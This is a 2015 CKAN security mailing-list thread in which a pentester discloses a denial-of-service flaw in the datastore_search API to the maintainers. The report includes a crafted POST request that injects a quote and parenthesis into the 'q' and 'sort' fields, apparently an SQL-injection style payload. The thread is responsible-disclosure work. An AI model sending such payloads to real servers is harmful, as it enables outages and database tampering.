[CKAN-Security] Tr : Re: CKAN v2.3 : DoS vulnerability with API
judicael.coryn at amicam.cnafmail.fr
judicael.coryn at amicam.cnafmail.fr
Mon Jul 20 15:10:17 UTC 2015
Hello,
We identified that CKAN is prone to a DoS when a json query is specially
crafted and POST to the API function datastore_search.
We send the request 5 times on the first server and ten times on the
second and we found two servers with only HTTP 500 response.
An example of request that we used to crash our servers :
==============================================================================================================
POST /api/3/action/datastore_search HTTP/1.1
...SNIP...
{"resource_id":"a1ab0ba7-856e-42cd-9e17-2467ae0c0bb2","q":"') query2,
plainto_tsquery('english',","filters":{},"limit":"100","offset":"0","sort":"Deplib')
asc"}&fq=1
==============================================================================================================
We expect that the three characteres >') < (single quote + closed
parenthesis + space) place in the 'q' and 'sort' parameters generate this
threat.
Best regards,
Judicaël CORYN
tél : 02.43.61.33.04
judicael.coryn at amicam.cnafmail.fr
mobile : 06.24.19.10.05
Afin de contribuer au respect de l'environnement, merci de n'imprimer ce
mail qu'en cas de nécessité
----- Transféré par Judicael CORYN/AMICAM/CNAF le 20/07/2015 15:53 -----
De : Adrià Mercader <adria.mercader at okfn.org>
A : "CKAN Security Alerts/Discussions" <security at lists.okfn.org>,
judicael.coryn at amicam.cnafmail.fr,
Date : 20/07/2015 11:33
Objet : Re: [CKAN-Security] CKAN v2.3 : DoS vulnerability with API
Hi Judicaël,
You can send the details to the list, and we will discuss the best
approach on the weekly development meeting.
Thanks
Adrià
On 20 July 2015 at 09:53, <judicael.coryn at amicam.cnafmail.fr> wrote:
Hello,
We have discovered during a black box pentest, in our company, the
possibilty to crash the ckan server. It's possible to made a DoS with one
CKAN API function.
How can we report to you this issue ?
Best regards,
Judicaël CORYN
tél : 02.43.61.33.04
judicael.coryn at amicam.cnafmail.fr
mobile : 06.24.19.10.05
Afin de contribuer au respect de l'environnement, merci de n'imprimer ce
mail qu'en cas de nécessité
_______________________________________________
CKAN security
https://lists.okfn.org/mailman/listinfo/security
https://lists.okfn.org/mailman/options/security/adria.mercader%40okfn.org
Repo: https://github.com/ckan/ckan-security
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.okfn.org/mailman/private/security/attachments/20150720/1d3e8d65/attachment.html>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: image/gif
Size: 5106 bytes
Desc: not available
URL: <https://lists.okfn.org/mailman/private/security/attachments/20150720/1d3e8d65/attachment.gif>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: image/gif
Size: 830 bytes
Desc: not available
URL: <https://lists.okfn.org/mailman/private/security/attachments/20150720/1d3e8d65/attachment-0001.gif>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: image/gif
Size: 830 bytes
Desc: not available
URL: <https://lists.okfn.org/mailman/private/security/attachments/20150720/1d3e8d65/attachment-0002.gif>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: image/gif
Size: 830 bytes
Desc: not available
URL: <https://lists.okfn.org/mailman/private/security/attachments/20150720/1d3e8d65/attachment-0003.gif>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: image/jpeg
Size: 770 bytes
Desc: not available
URL: <https://lists.okfn.org/mailman/private/security/attachments/20150720/1d3e8d65/attachment.jpe>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: image/gif
Size: 5106 bytes
Desc: not available
URL: <https://lists.okfn.org/mailman/private/security/attachments/20150720/1d3e8d65/attachment-0004.gif>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: image/gif
Size: 830 bytes
Desc: not available
URL: <https://lists.okfn.org/mailman/private/security/attachments/20150720/1d3e8d65/attachment-0005.gif>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: image/gif
Size: 830 bytes
Desc: not available
URL: <https://lists.okfn.org/mailman/private/security/attachments/20150720/1d3e8d65/attachment-0006.gif>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: image/gif
Size: 830 bytes
Desc: not available
URL: <https://lists.okfn.org/mailman/private/security/attachments/20150720/1d3e8d65/attachment-0007.gif>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: image/jpeg
Size: 770 bytes
Desc: not available
URL: <https://lists.okfn.org/mailman/private/security/attachments/20150720/1d3e8d65/attachment-0001.jpe>
More information about the Security
mailing list